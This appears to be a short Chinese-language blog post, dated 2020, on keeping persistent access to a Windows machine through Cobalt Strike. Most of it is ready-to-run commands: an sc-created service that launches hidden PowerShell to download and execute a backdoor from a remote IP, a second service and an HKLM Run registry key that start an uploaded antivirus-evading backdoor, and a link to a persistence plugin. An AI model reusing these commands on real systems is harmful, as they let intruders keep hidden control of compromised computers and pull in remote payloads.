Cobalt Strike权限维持

比较菜,目前需要上线的目标是system权限

1、sc创建自启动服务

以下命令都是在cs中执行的,在cmd中测试只需要删掉前面的shell就行

先创建一个服务(需要system权限)

shell sc create "shell" binpath= "cmd /c start powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.123.54/后门文件'))\""

 

 

 因为是拿自己的电脑测试的,直接用win+r启动services.msc来查看服务状态确认一下,此时还是手动的。

 

 

 设置自启动

shell sc config "shell" start= auto

设置描述

shell sc description "shell" "shell persistence"

启动服务

shell net start "shell"

删除服务

shell sc delete "shell"

 

如果没有公网IP,也可以上传一个免杀后门到目标上,也是使用sc配置一个自启动服务来进行权限维持  

sc create "shell_local" binpath= "C:\Users\Public\BypassAV.exe(文件路径)"

sc description "shell_local" "shell_local_persistence"

sc config "shell_local" start= auto

net start "shell_local"

 

2、注册表自启动

同样需要先需要上传一个免杀后门

命令shell reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "shell_regedit" /t REG_SZ /d "C:\Users\Public\BypassAV.exe(文件路径)" /f

要删除也简单shell reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "shell_regedit"

 当然、也可以采用插件

https://github.com/ZonkSec/persistence-aggressor-script


 

 

posted @ 2020-10-03 11:13  This_is_Y  阅读(798)  评论(0编辑  收藏  举报